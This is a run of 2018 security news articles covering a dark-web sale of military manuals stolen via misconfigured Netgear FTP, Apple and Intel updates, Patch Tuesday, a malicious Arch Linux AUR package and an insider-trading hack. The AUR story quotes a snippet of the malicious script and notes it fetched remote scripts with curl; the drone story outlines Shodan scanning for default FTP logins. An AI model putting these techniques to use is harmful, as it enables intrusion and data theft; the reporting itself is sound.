STE WILLIAMS

Sensitive US Air Force documents have leaked onto the dark web as part of an attempted sale of drone manuals.

Threat intel firm Recorded Future picked up on an auction for purported export-controlled documents pertaining to the MQ-9 Reaper drone during its regular work monitoring the dark web for criminal activities last month. Recorded Future’s Insikt Group analysts, posing as potential buyers, said they’d engaged the newly registered English-speaking hacker before confirming the validity of the compromised documents.

Further interactions allowed analysts to discover other leaked military information available from the same threat actor. The hacker claimed he had access to a large number of military documents from an unidentified officer.

These documents included a M1 Abrams tank maintenance manual, a tank platoon training course, a crew survival course, and documentation on improvised explosive device mitigation tactics.

Subsequent work revealed that this info was actually pulled from at least one and more likely a series of insecure File Transfer Protocol (FTP) servers. “The attacker used a widely known tactic of gaining access to vulnerable Netgear routers with improperly setup FTP login credentials,” Recorded Future said.

Two years ago researchers warned that Netgear routers with remote data access capabilities were susceptible to attack if the default FTP authentication credentials were not updated. Despite the stretch of time, it’s still a common issue. During its research, Recorded Future identified more than 4,000 routers susceptible to attack.

Dark web market drone ad

Exploitation was far from difficult. Utilising Shodan’s machine data search engine, the hacker scanned large segments of the internet for high-profile misconfigured routers that use a standard port 21 to hijack all valuable documents from compromised machines.

The hacker first infiltrated the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech [Air Force Base] in Nevada, and stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper [Aircraft Maintenance Unit]. While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.

The captain, whose computer had seemingly been compromised recently, had completed a cybersecurity awareness course, but he did not set a password for an FTP server hosting sensitive files. This allowed the hacker to easily download the drone manuals, said the researchers. The precise source of other the other dozen or so manuals the hacker offered for sale remains undetermined.

“The source was never disclosed to Recorded Future. However, judging by the content, they appear to be stolen from the Pentagon or from a US Army official.”

The hacker let slip that he was also in the habit of watching sensitive live footage from border surveillance cameras and airplanes. “The actor was even bragging about accessing footage from a MQ-1 Predator flying over Choctawhatchee Bay in the Gulf of Mexico.”

Researchers identified the “name and country of residence” of an individual associated with a group it reckons is responsible for the illicit sale of US military manuals. Recorded Future has not identified the country responsible but said that it is continuing to “assist law enforcement in their investigation” of the trade in classified documents.

Early indications suggest a single hacker or small group of associates, rather than organised crime or state-sponsored hackers.

The military response teams will determine the exact ramifications of both breaches. However, the fact that a single hacker with moderate technical skills was able to identify several vulnerable military targets and exfiltrate highly sensitive information in a week’s time is a disturbing preview of what a more determined and organized group with superior technical and financial resources could achieve.

All sorts of bad stuff – including personal information – is hawked through dark web bazaars but classified material is seldom offered. Recorded Future said the latest case is almost unprecedented.

“It is not uncommon to uncover sensitive data like personally identifiable information, login credentials, financial information, and medical records being offered for sale on the dark web. However, it is incredibly rare for criminal hackers to steal and then attempt to sell military documents on an open market.” ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/us_military_manual_dark_net_sale/

Apple updates software for nearly every hardware platform, though one new feature almost steals the security show.

Apple has released a set of updates to its operating system across its range of hardware, from the Apple Watch to the Mac. While the updates cover a number of issues, a USB attack and its prevention may be the most important among them.

The mass release isn’t unusual behavior for Apple, says Thomas Reed, director of Mac and mobile at Malwarebytes Labs. “When Apple releases these updates, they tend to release one for each of their products,” Reed says. “They’ll release a whole bunch of these on the same date.”

Apparent from an inspection of the issues addressed in the MacOS update is that companies continue to deal with fallout from the Meltdown and Spectre vulnerabilities. On the website announcing the updates, Apple describes one vulnerability in which ” … one process may infer register values of other processes through a speculative execution side channel that infers their value.” This could be the broad description of the entire family of Meltdown vulnerabilities.

Reed describes most of the remaining updates as important but not particularly unusual. One, though, has seen a great deal of attention from analysts and law enforcement officials: USB Restricted Mode.

USB Restricted Mode is a new feature that prevents data from being downloaded from an iOS device unless the device has been unlocked within the past hour. The new restriction seems targeted against devices like the GreyLock, which law enforcement agencies have purchased and used to conduct forensic analysis on iPhones and iPads.

“Companies don’t want to make things harder specifically for law enforcement, but we’ve seen these devices being used by bad actors or bad governments,” Reed says. At the same time, he notes a limitation in the restriction: “I don’t understand why they didn’t just make it so you have to unlock the device every time, rather than having the one-hour limit.”

That one-hour window in which data can be downloaded from the device has been seized on by analysts and journalists as a significant flaw in the protection. Oleg Afonin, who blogs at Elcomsoft.com, explains that plugging an accessory (just about any accessory, at that) into the Lightning jack during the one-hour window can easily extend the window of vulnerability indefinitely.

While Afonin’s tests showed that USB Restricted Mode operates as planned in most cases – holding the ports closed through reboots and protecting the device from unauthorized data exfiltration – the ability to work around the mode with a simple accessory is a critical weakness.

Even with this limitation, Reed says that applying the updates and patches is critical for the security of all affected Apple devices. “The more important thing for people to know about the updates is just how important it is to install them,” he says. And the reason is one of the paradoxical qualities of software patching.

“Just as soon as they’re out there, the information on what was patched is published, and hackers have a clue about how they could hack people with the older systems,” Reed explains. “It’s almost like the update makes the older systems even more vulnerable.”

Related Content:

• New ‘Mac-A-Mal’ Tool Automates Mac Malware Hunting Analysis
• Deep Instinct Adds MacOS Support
• Apple Mac Models Vulnerable to Targeted Attacks
• 7 Spectre/Meltdown Symptoms That Might Be Under Your Radar

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/operations/apple-releases-wave-of-security-updates/d/d-id/1332268?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Measuring security risk is not that hard if you get your terms straight and leverage well-established methods and principles from other disciplines.

How enthusiastic would you be to ride on a spacecraft if you knew that the scientists and engineers who designed it and planned the mission couldn’t agree on the definition of mass, weight, and velocity?

A quick look at the word “risk” in Wikipedia provides a clue regarding the variety of definitions that exist for a foundational term in our profession. But inconsistent formal definitions are really just the tip of the iceberg. For example, I like to ask audiences, “Which of these are risks?”:

• Vulnerabilities
• Disgruntled employees
• Reputation
• Untested recovery plans
• Sensitive consumer information
• Weak passwords
• Cybercriminals

Almost without exception, the answer I hear is “All of them!” The truth, however, is that none of them are risks. Vulnerabilities are not risks and we need to stop acting like they are. Disgruntled employees and cybercriminals are threat communities; reputation and sensitive consumer information are assets; and weak passwords and an untested recovery plan are (deficient) controls. In other words, although these are all parts of the risk landscape, they are importantly different from one another.

Furthermore, when I asked an audience of seasoned infosec professionals to list the top three risks their organizations faced, the following word cloud resulted:

I find “unknown” to be particularly ironic.

Why does it matter? Can’t we usually glean the meaning of a term through the context in which it’s being used? Although that’s often true in conversation with colleagues in our profession, clarity is crucial when we’re speaking with people outside of our profession — such as executives — and when we’re trying to measure something. I’ll touch on measurement in a minute. For now, let’s focus on communication.

As a profession, we’ve been saying for a long time that we need to speak the language of business in order to get and maintain the support we need to be effective. That being the case, it’s only logical that our use of the word “risk” be driven by how executives think about it.

What senior executives and boards want from us is to help their organizations manage the frequency and magnitude of infosec-related loss events. These loss events are the “risks” we’re supposed to manage. This is aligned with the rest of their risk world, and it also enables far more effective measurement and communication. A couple of example infosec risks are:

• Cybercriminal compromise of consumer personal data
• Disgruntled employee crashing a system that supports a critical business process

The same executive stakeholders whose eyes glaze over when we talk about vulnerabilities and threat vectors suddenly take interest when the risks we talk about are loss events. These risks also provide the context in which we can measure and express the significance of problems in the risk landscape like changes in threat vectors or the vulnerabilities we’re trying to resolve.

Imagine, for example, being able to explain to an executive how a change in threat activity increases the likelihood of the compromise of personally identifiable information by somewhere between 20% and 30%, with a resulting increase in loss exposure of between $500,000 and $1 million. No executive in the world is going to have difficulty wrapping their mind around that.

Of course, that raises the question, “Can we measure infosec risk?” The short answer, despite what you may have heard or believe, is yes. In fact, we do it all the time.

Measurement is a prerequisite to prioritization, and you and I both know that we prioritize all the time. Unfortunately, given the inconsistency and ambiguity with which we approach infosec risk, we’re horrible at it. Here’s some bad news: 70% to 90% of the “high risks” I’ve examined in organizations over the past several years do not, in fact, represent high risk. This means that those organizations have a significant signal-to-noise problem and aren’t able to focus on the things that matter most. And if you think about it, the inability to prioritize effectively is a gift to the bad actors (as if they didn’t already have enough advantages) and a failure on our part as stewards of the resources we’re given.

The good news is that measuring infosec risk is not that hard once you’ve gotten your terms straight and when you leverage well-established methods and principles from other risk disciplines. Good sources of information on this include:

• How to Measure Anything in Cybersecurity Risk by Douglas W. Hubbard and Richard Seiersen
• Measuring and Managing Information Risk: A FAIR Approach by Jack Jones and Jack Freund

Every discipline we think of as mature today — math, medicine, physics, etc. — all went through an early phase in which nobody could agree on fundamental terms or principles. In that sense, we’re in good company. But given today’s imperatives surrounding cyber and technology risk management, we do not have the luxury of decades to get our act together.

Related Content:

• Insider Threats: Red Flags and Best Practices
• Secure by Default Is Not What You Think
• White House Email Security Faux Pas?
• Insider Dangers Are Hiding in Collaboration Tools

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Register before July 27 and save $700! Click for more info. 

Jack Jones is one of the foremost authorities in the field of information risk management. As the Chairman of the FAIR Institute and Executive VP of Research and Development for RiskLens, he continues to lead the way in developing effective and pragmatic ways to manage and … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/what-we-talk-about-when-we-talk-about-risk/a/d-id/1332192?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware.

If you’re an Arch Linux user who downloaded a PDF viewer named “acroread” in the short time it was compromised, you’ll need to delete it. While the breach isn’t regarded as serious, it sparked a debate about the security of untrusted software.

The user repository included the acroread package, which had been abandoned by its maintainer. Someone using the handle “xeactor” adopted the package and modified it to download malicious scripts from a remote server.

Gentoo GitHub repo hack made possible by these 3 rookie mistakes

READ MORE

When that was discovered, maintainer Eli Schwartz reverted the commits, suspended xeactor’s account, and discovered (and removed) two other packages with similar modifications.

A later post in the Arch Linux mailing list suggested the “attack” was a warning of another issue. As Bennett Piater wrote: “A script that creates ‘compromised.txt’ in the root and all home folders looks like a warning to me.”

Here’s the code that created the “warning” text file:

for x in /root /home/*; do
        if [[ -w "$x/compromised.txt" ]]; then
                echo "$FULL_LOG"  "$x/compromised.txt"
        fi
done

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

Lending further weight to its status as a warning was another message from Schwartz: “Side note on the acroread pastes: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an ssupload() function then tries to execute the contents of $uploader to actually upload the data collection.”

Schwartz said that “as-is”, that code wouldn’t work.

Arch’s Giancarlo Razzolini suggested warning that user-provided (and therefore untrusted) AURs might contain bad code is an overreaction.

“This thread is attracting way more attention than warranted,” he wrote (oh, and now it’s in the media … sorry). “I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often”, Razzolini added. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/someone_modified_arch_linuxs_acrobat_reader_adds_security_warning/

Two former investment bankers, one of whom is also a priest, have been found guilty of an elaborate scam – hacking newswires to read press releases prior to publication, and trade millions using this insider information.

Vitaly Korchevsky, formerly a veep at Morgan Stanley and a pastor at the Slavic Evangelical Baptist Church in Philadelphia, USA, and ex-broker Vladislav Khalupsky were this month found guilty of securities fraud by a jury in New York, and are facing 20 years in the slammer.

According to court documents, the two colluded with a Ukrainian hacking gang and investors in the US, Russia, France, and Cyprus to realized more than $100m in illicit profits. America’s financial watchdog, the Securities and Exchange Commission, said it has since recovered $53m of the haul.

The scam, carried out between 2010 and 2015 involved Ukrainian hackers getting into the servers of two unnamed newswire services, one in New York and the other in Canada. The miscreants searched for embargoed press releases on companies’ quarterly financial figures, which are typically privately submitted to a newswire a couple of days before they are published, and accessed more than 100,000 of them before being caught.

The strange tale of an energy biz that suddenly became a blockchain upstart – and $1.4m now forfeited in sold shares

READ MORE

In one case, engineering giant Caterpillar sent its 2011 third-quarter results to a newswire, and less than a day later, the gang started trading in its stock. When the figures were published three days later, the shares rose by over $4, netting the miscreants $760,000 in profit.

“Conspiring with hackers overseas, Korchevsky and Khalupsky worked swiftly to trade on stolen press releases, illegally profiting millions of dollars,” said FBI Assistant Director-in-Charge William Sweeney late last week.

“Such a massive criminal operation called for massive cover-ups, but their attempts to cover their tracks were done in vain. Devoting much time to the execution of this sneaky scheme, upon sentencing, the defendants will now rightfully face time in prison.”

The conspirators demonstrated pretty good operational security – compartmentalizing their hardware and wireless hotspots solely for their illegal trading and destroying some equipment to cover their tracks. However, SEC investigators spotted the similarities in multiple trades, and started asking questions.

Khalupsky used his financial knowledge to set up shell companies that allowed investors to use the insider knowledge to take out options on selected shares and profit once the earnings announcements were made. In return, he took a cut of the action and is thought to have made nearly a million dollars in commissions.

Korchevsky, on the other hand, traded for himself and is accused of making $17.5m in illicit profits, most of which has now been seized. Other members of the gang who have been arrested have pleaded guilty, and all parties will be sentenced at a later date. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/priest_broker_100m_hack/

The security industry’s supply chain is currently inferior to that of its attackers, says Carbon Black CEO Patrick Morley, but he thinks the industry is finding ways to fight back.

In conversation with The Register yesterday, Morley advanced a theory that exploit brokers, malware authors and other bad actors work together. Security vendors, by contrast, tend to work alone.

“We don’t do as good a job, as defenders,” he said. Matters aren’t helped by miscreants increasingly use “living off the land attacks” that require no malware. Instead they find a way in through tools everyone uses – email or browsers – and then seek out software on an endpoint that can do something nasty. That’s often something with known vulnerabilities, like PDF readers, or something like PowerShell that can pull a machine’s strings.

The evil supply chain works well in such scenarios because one player will create the poison web site, another will sell a zero-day to crack whatever’s found on an endpoint and a third will deliver and harvest the cryptocurrency-mining payload.

Happily Morley thinks that the industry is starting to network in useful ways that make all players’ wares more effective.

One way that security vendors are fighting back is with the kind of cloudy aggregation Carbon Black already practices. The company not only monitors its users’ endpoints for odd behaviour but combines data from all its clients so that it can look for patterns that represent attacks. The CEO spoke of being able to detect legitimate and malicious use of PowerShell through such analysis of aggregated experiences.

Another is by facilitating networking opportunities for users. Carbon Black’s conferences now include candid sharing sessions at which clients ‘fess up to their security scares. ServiceNow does something similar but in closed forums.

A third is by integrating with other security vendors. While confident in his own products’ protective powers, Morley admitted that he doesn’t have all the answers and that users will benefit from as much information as possible. That belief is why Carbon Black partners with networking and other security software vendors.

Carbon Black is also adding to its own services. The company is currently beta testing “LiveOps”, a tool Morley said stateful queries of endpoints and enables users to ask “almost any question I want of an endpoint” and another called “CB response”, a detection and response tool.

Asked by The Register if the new services suggest Carbon Black could expand into other fields that can benefit from a large pool of anonymised user data, Morley said that he sees multiple uses for the data Carbon Black collects. “The average user has 70 security products,” he said. If Carbon Black can help them to reduce that count by even five, he sees happy days ahead.

He also said that customers will buy into consolidation of the security industry, because a lot of security products were bought without a strategy. With more organisations hiring chief security officers, Morley believes buyers are now looking for platforms, not products. And he’s aiming to be the former. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/carbon_black_ceo_patrick_morley_interview/

Promo Keeping pace with a fast-changing security landscape is becoming an often baffling challenge for many organisations.

Press reports of daring hacking exploits inflicting serious damage on prominent companies have made recruiting security-savvy employees who can detect and prevent intrusions a high priority.

If you are a security professional, SANS London September 2018 promises to deliver immersion training that will arm you with the deep skills you need defend your organisation from intrusion and keep it safe in the future.

Run by leading security training provider SANS, the event runs 17-22 September at the Grand Connaught Rooms in London, England. An intensive programme of lectures on cutting-edge aspects of cybercrime and security, combined with hands-on lab work, will sharpen your security skills and enable you to gain valuable GIAC specialist certification in your chosen area.

SANS assures attendees that they will be able to bring their newfound skills into play as soon as they return to work.

Course topics include:

• Security essentials bootcamp style Do you fully understand why some organisations get compromised? Would you be able to find compromised systems on your network? Do you know the effectiveness of each security device? Are proper security metrics communicated to your executives? Instructor Ian Reynolds in-depth bootcamp-style course reinforced with hands-on lab work will ensure you can answer these questions with confidence.
• Hacker tools, techniques, exploits, and incident handling If your organisation has an internet connection or one or two disgruntled employees, your computer systems will be attacked. Instructor Steve Armstrong provides penetration testing and incident response services for the gaming and music media and has inside knowledge of attackers’ tactics and strategies. Hands-on experience in finding vulnerabilities and dis-covering intrusions will enable you to discover the holes in your system before the bad guys do.
• Windows forensic analysis Government agencies increasingly require media exploitation specialists to recover vital intelligence from the huge amount of data held on Microsoft systems. The course focuses on building digital forensics knowledge of Microsoft Windows 7, Windows 8/8.1, Windows 10 and Windows Server 2008/2012/2016. You will learn how to recover, analyse and authenticate forensic data, track user activity on your network, and organise findings for use in incident response, internal investigations and litigation. Instructors David Cowen and Lee Whitfield have led investigations involving everything from revealing insider threats to intellectual property theft and child exploitation.

More information and registration details here.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/sans_london_september_2018_cyber_security_training/

It’s the hot story right now in Europe…

…no, we’re not talking about the news that France just dumped neighbours Belgium out of the World Series with a 1-0 victory. [Surely you mean the World Cup? – Ed.]

We’re talking about the widepspread media coverage that the UK Information Commissioner’s Office (ICO) intends to fine Facebook £500,000 (about $660,000) over the Cambridge Analytica fiasco:

[The ICO intends] to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.

Cambridge Analytica (CA) – in cased you missed the saga as it uncoiled itself earlier this year – was a web analytics company started by a group of researchers with connections to Cambridge University in the UK.

Put web analytics together with the word Cambridge and you get the cool-sounding name Cambridge Analytica.

What seems to have started as some sort of academic research project soon morphed into a commercial enterprise that allowed participants to take psychometric tests via a Facebook app.

(Facebook apps are essentially plugins for the Facebook platform rather than applications in the traditional sense.)

The sneaky? bait-and-switchy? sleight-of-hand? devious? obvious-with-hindsight? why was anyone surprised? [delete as inappropriate] trick employed in the CA app was that the app explicitly asked you to give it access to account data that wasn’t available by default.

Notably, Cambridge Analytica acquired access to your profile, including a list of all your friends.

That means not only that the app learned a lot about you, but could associate your own “psychometric profile” with your friends – even if they disapproved of psychometric tests; even if they’d never have agreed themselves; indeed, even if they’d never heard of Cambridge Analytica.

As we explained back in March 2018:

You might well question how 270,000 people signing up for a Facebook personality quiz blossomed into a potential data breach affecting 50 million users [now 87 million users] – nearly 25% of potential US voters.

[…] The app scraped not just test-takers’ private profile data, but also that of their friends. Facebook didn’t disallow such behavior from apps at the time, but such data harvesting was allowed only to improve user experience in the app, not to be sold or used for advertising.

Facebook ultimately kicked CA off its platform, but not before a global brouhaha had erupted over whether the social networking giant ought to have done more to make sure that app developers stuck to both the letter and the spirit of Facebook’s own rules.

The ICO certainly seems to think Facebook could have, and should have, done more to stop Cambridge Analytica getting away with its industrial-scale data harvesting – thus the fine.

What next?

Would the ICO have hit Facebook harder if it could?

The ICO’s own announcement makes a point of mentioning that, even though current GDPR rules could in theory have led to a very much bigger fine, “due to the timing of certain incidents in this investigation, civil monetary penalties have to be issued under the previous legislation, the Data Protection Act 1998.”

The maximum financial penalty in civil cases under pre-GDPR laws is £500,000 – and that’s the amount the ICO chose.

Will Facebook pay up?

The ICO’s “fine” is currently only a Notice of Intent, so Facebook still has the right of reply.

Will we all be more careful with apps and plugins in future?

Let’s hope so – remember our simple rule: IF IN DOUBT, DON’T GIVE IT OUT.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/CKwWlBK3E14/

Exclusive Intel will today emit a dozen security alerts for its products – including details of another data-leaking vulnerability within the family of Spectre CPU flaws.

This bundle of disclosures is the start of the processor giant’s efforts to move to a quarterly cadence of updates, we understand. Rather than drop surprise alerts onto its security advisory page at irregular intervals, Intel hopes to gradually adopt a routine similar to Microsoft’s monthly Patch Tuesday, albeit once every three months.

Urgent security updates will be pushed out in between these quarterly batches. Some fixes may be emitted outside of this quarterly cadence if they are due to be released on a specific date in a coordinated disclosure with other organizations, and that date falls outside Intel’s schedule.

Motherboard manufacturers, computer makers, operating system developers, and other Intel partners, will privately get a long heads up before these quarterly updates are made public. For instance, today’s patches were shared with manufacturers in March, allowing them to prepare to roll out fixes to customers.

From what we understand, Intel hopes to give folks – from IT administrators to ordinary netizens – time and notice to plan for installing security updates at regular-ish intervals, rather than relying on them to look out for sporadic patches.

Speculative execution continues to haunt

The new Spectre-class side-channel vulnerability in Intel’s processors, to be disclosed today, can be exploited in a bounds-check bypass store attack. This means malicious code already running on an Intel-powered computer can potentially extract passwords, cryptographic keys, and other sensitive information, from other running software threads by altering the flow of speculative execution.

Despite the word “store” in the attack, no actual code or data in memory is altered. However, as far as the CPU’s speculative execution engine is concerned, function pointers and return addresses are overwritten in the attack, allowing the malicious code to change the CPU’s course, and infer the contents of memory that should be out of reach.

This can be done by speculatively overwriting variables and other temporary values, or by speculatively overrunning buffers by tricking the processor into speculatively executing more iterations of a loop than anticipated. Even memory that should be read-only can be speculatively written to in order to potentially perform side-channel extraction of data. Vulnerable code can be as trivial as…

uint8_t buffer[256];
int i;

for(i = 0; i  256; i++)
  buffer[i] = *src++;

More technical information on bounds-check bypass store attacks can be found, here, in section 2.2.1, and here in a paper out today by Vladimir Kiriansky and Carl Waldspurger.

The good news is that software mitigations available today for Spectre variant 1 will thwart bounds-check bypass store attacks. Thus, web browsers and other applications employing anti-Spectre mechanisms should be safe.

For programmers and compiler writers, this means slipping LFENCE instructions into code, before it reads from memory, to act as a barrier, or clipping array bounds using a bitmask, as described here, in section four.

The other good news is that there is little or no malware known to be circulating in the wild exploiting Spectre vulnerabilities to steal information: it is far easier for miscreants to persuade people to download and install software nasties disguised as legit applications, trick them with phishing emails, or attack holes in email clients and PDF readers, to commandeer their PCs.

Instead, Spectre, for now, remains a fascinating insight into the world of CPU design, where engineers across the industry trade off a little security for a little more performance.

Streamlining

“As we continue working with industry researchers, partners and academia to protect customers against evolving security threats, we are streamlining security updates and guidance for our industry partners and customers when possible,” a spokesperson for Intel told The Register on Tuesday.

“With this in mind, today we are providing mitigation details for a number of potential issues, including a new sub-variant of [Spectre] variant 1 called Bounds Check Bypass Store, for which mitigations or developer guidance have been released.

“More information can be found on our product security page. Protecting our customers’ data and ensuring the security of our products is a top priority for Intel.”

More than half of today’s Chipzilla advisories were the result of research carried out by its own staff, whose minds have been doubly focused on the security of their products following the Meltdown and Spectre disclosures earlier this year. The alerts will cover things from firmware to Intel’s flavor of Python. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/10/intel_security_spectre_advisories/

IT admins face a busy week ahead as Microsoft, Intel, and Adobe have issued bundles of scheduled security fixes addressing more than 150 CVE-listed vulnerabilities.

Surprise, surprise, Microsoft has a ton of browser fixes

For Redmond, the July Patch Tuesday will bring fixes for 53 individual bugs, 25 of those allowing for remote code execution attacks.

This includes the usual array of Edge and Internet Explorer memory corruption flaws that could allow an attacker to place exploits within a web page and use them to take over a system with the current user’s rights.

RCE bugs were also patched in the PowerShell Editor Services (CVE-2018-8327), Visual Studio (CVE-2018-8172), and .NET Framework (CVE-2018-8260), SharePoint (CVE-2018-8300), Wireless Display Adaptor (CVE-2018-8306), Skype for Business and Lync (CVE-2018-8311), Access (CVE-2018-8313), and Office (CVE-2018-8281).

Outside of the 25 remote code execution flaws, ZDI researcher Dustin Childs says admins will want to pay special attention to CVE-2018-8319, a security bypass flaw in the MSR JavaScript Cryptography Library, CVE-2018-8304, a denial of service in the Windows DNSAPI, and CVE-2018-8310, a tampering vulnerability in the way Outlook handles attachments in HTML emails, clearing the way for additional attacks via malicious fonts.

“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email,” Childs explained. “Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters.”

Intel kicks off quarterly update campaign

The first edition of Intel’s new quarterly security update program also arrived on Tuesday, with Chipzilla patching a dozen holes in its platforms.

In addition to the new Spectre side-channel variant described in detail here, the Intel update includes a fix for CVE-2017-5704, a flaw that could allow attacker with local access to pull the BIOS or AMT passwords out of memory.

Other advisories from Chipzilla include:

• SA-00159, a condition where EDK 2 untested memory is left unprotected by SMM Page Protection in Tianocore firmware, potentially allowing elevation of privilege and Information Disclosure.
• SA-00158, what Intel describes as elevation of privilege from “insecure handling of certain UEFI variables”.
• SA-00157, a fix for a denial of service bug in the bottle.py component in Quartus Prime Pro.
• SA-00152, an elevation of privilege bug from a firmware authentication bypass in 4th generation and later Core processors .
• SA-00151, a bug in Quartus that allows an attacker to replace the required executables that load on reboot.
• SA-00132, an input validation error that could allow for denial of service in VTune Amplifier, Advisor, and Inspector.
• SA-00130, a denial of service flaw in the BMC firmware.
• SA-00129, a denial of service bug caused by an input validation error in the Bleach module for Intel Distribution for Python (IDP) component.
• SA-00118, a fix for an elevation of privilege error in the Converged Security Management Engine (CSME).
• SA-00114, a bug in the Optane memory module that left some media running Whole Disk Encryption “unencrypted and potentially accessible under specific conditions”. Intel doesn’t say what those conditions are, but the attacker would need physical access to the storage.
• SA-00112, a fix for an elevation of privilege flaw in the Active Management Technology component of CSME.

Massive Adobe Reader and Acrobat patches

This month, Adobe somehow managed to find itself plugging nearly twice as many security holes as Microsoft.

Most of the fixes came in the form of a monster patch for Reader and Acrobat that cover 104 CVE-listed vulnerabilities. Adobe says the bugs are all rated either ‘critical’ or ‘important’ and include both remote code execution and information disclosure flaws that would be exploited via malicious PDF files.

Flash Player is getting an update for two flaws, one allowing remote code execution and another information disclosure. Three more flaws were spotted and squashed in Adobe Connect allowing for authentication bypass, while three server side request forgery bugs were patched in the Adobe Experience Manager. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/11/july_patch_tuesday/